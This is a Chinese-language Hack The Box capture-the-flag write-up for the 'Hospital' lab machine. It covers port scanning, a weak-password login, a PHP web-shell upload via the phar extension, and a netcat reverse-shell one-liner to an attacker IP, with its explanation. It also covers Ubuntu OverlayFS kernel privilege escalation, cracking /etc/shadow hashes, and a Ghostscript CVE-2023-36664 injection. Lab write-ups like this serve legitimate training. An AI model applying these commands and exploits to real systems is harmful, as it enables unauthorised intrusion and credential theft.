一、环境开启配置
二、过程
三、总结
一、环境配置
Hack the box的注册以及开通请移步其他文章,下载好靶场的vpn文件后,通常情况下,为了降低延迟我会选择在ovpn文件中加入代理如socks-proxy ip地址 port
由于是第一篇htb的文章,所以如何开启靶场的过程相对详细一点,最后开启靶机测试连接的延迟
二、过程
接下来开始正式的过程,因为是靶机首先拿到手第一步,省去了资产确认的步骤,直接扫描
nmap --min-rate 5000 -p 10.10.11.241 -oN ports 保存到ports文件中
发现好多的端口服务,通过grep open、awk、paste提取整合
nmap全面扫描 nmap -sCVT -O -p 22,53,88,135,139,389,443,445,464,593,636,1801,2103,2105,2107,2179,3268,3269,3389,5985,6063,6404,6406,6407,6409,6613,6635,8080,9389 10.10.11.241
可以看到里面包含域名DC.hospital.htb,把它分段一股脑写入/etc/hosts中
接下来根据开放的端口,尝试了web页面的443以及8080,443一直转圈圈然后提示错误,错误中暴露了Apache的版本和nmap扫出来的一样
然后尝试8080发现进入一个网页
查看源代码没什么特别,随便是个admin/admin提示错误,想着用bp爆破一下,然后随手又试了一下其他弱口令admin/123446,竟然进去了
只有一个上传点,尝试了几个后缀发现都失败了,然后决定爆破一下后缀,于是找了一轮后缀写成一个字典 注意前面三个是被黑名单的后缀,后面的后缀回显是success.php表示能成功上传
通过研究par、phar可以知道能解析php文件,写入<? php phpinfo(); ?>测试,但还不知道上传的路径,所以下一步尝试目录爆破,字典的尝试自行选择
尝试了几个字典后发现了uploads的路径,尝试发现解析了phpinfo出来成功,后续尝试写入一句话反弹shell,发现连接秒断,应该是被杀了,由于本人比较懒不想研究,于是通过查看其他博主的shell https://github.com/flozz/p0wny-shell尝试
git clone下载后改名改后缀上传,访问目录后进入下面的页面,为了方便,通过执行反弹shell到kali上
这里尝试很多的反弹方法反弹出来的结果不能回显,于是查阅了资料参考了其他文章
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i2>&1nc 10.10.14.36 443 >/tmp/f
1. 删除/tmp/f文件(如果它存在的话)
2. 创建一个命名管道(FIFO)/tmp/f
3. 使用cat命令将输入重定向到/tmp/f,然后将输出重定向到标准错误输出(2>&1)
4. 使用nc命令连接到指定的IP地址和端口,并将连接的输入/输出重定向到/tmp/f
这个命令的目的是将nc命令的输入和输出通过/tmp/f管道传输到指定的IP地址和端口。
提权通过查看内核版本信息,googel出几个个github上的方法,通过测试发现exploit.c的这个可以实现提权 参考地址:GitHub - briskets/CVE-2021-3493: Ubuntu OverlayFS Local Privesc
查看信息的过程,发现/etc/shadow有用户drwilliams的密码信息且有/bin/bash权限
通过john丢kali自带的字典爆破出密码,尝试开始的网站登录发现失败
想起443端口的网址,但是用端口尝试但回显还是错误(不知道什么原因,懒得找了),于是用https去尝试域名发现可以打开。输入用户名密码后成功进去
打开后,有一封邮件,看着应该是一个医院邮件后台,打开邮件分析
目前得到的是.eps以及GhostScript的信息,然后开始google hacking看看是干嘛的GhostScript exploit,找到了这个地址:GitHub - jakabakos/CVE-2023-36664-Ghostscript-command-injection: Ghostscript command injection vulnerability PoC (CVE-2023-36664)
在线网站构造我们的payload:Online - Reverse Shell Generator (revshells.com)
成功拿到shell
接下来dir查看信息,在Desktop找到user.txt
由于对Windows下的操作并不熟悉,所以后文跟着其他博主的思路复现